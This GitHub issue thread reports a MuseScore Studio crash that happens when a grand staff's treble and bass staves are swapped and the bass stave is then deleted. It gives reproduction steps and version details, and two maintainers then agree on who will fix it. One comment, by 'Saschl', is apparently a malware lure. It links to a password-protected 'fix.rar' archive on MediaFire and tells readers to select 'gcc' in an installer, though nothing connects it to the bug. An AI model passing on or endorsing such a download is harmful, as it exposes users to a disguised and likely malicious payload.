### ISSUE TITLE
Grand staff swap and delete stave crash

### ISSUE THREAD

**Issue by zacjansheski** [musescore/MuseScore#24207]
### Issue type

Crash or freeze

### Description with steps to reproduce

There are other ways to reproduce this, but this is the "natural" way to do it

1. Open template "Bass Clef"
2. Add staff (treble clef)
3. Switch treble and bass
4. Delete bass.  Crash.

### Supporting files, videos and screenshots

https://github.com/user-attachments/assets/db653326-d45b-4078-b2ff-a11d9da30b0c

### What is the latest version of MuseScore Studio where this issue is present?

OS: macOS 14.6, Arch.: arm64, MuseScore Studio version (64-bit): 4.4.0-242390800, revision: github-musescore-musescore-0fcd11b

### Regression

No.

### Operating system

Mac OS 14

### Checklist

- [X] This report follows the [guidelines](https://github.com/musescore/MuseScore/wiki/Reporting-bugs-and-issues) for reporting bugs and issues
- [X] I have verified that this issue has not been logged before, by searching the [issue tracker](https://github.com/musescore/MuseScore/issues) for similar issues
- [X] I have attached all requested files and information to this report
- [X] I have attempted to identify the root problem as concisely as possible, and have used minimal reproducible examples where possible

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by cbjeukendrup** [comment]
@mathesoncalum I started looking into this for fun and think I'm about to have a solution now; is it okay if I take this one?

**Comment by mathesoncalum** [comment]
@cbjeukendrup sure - all yours!
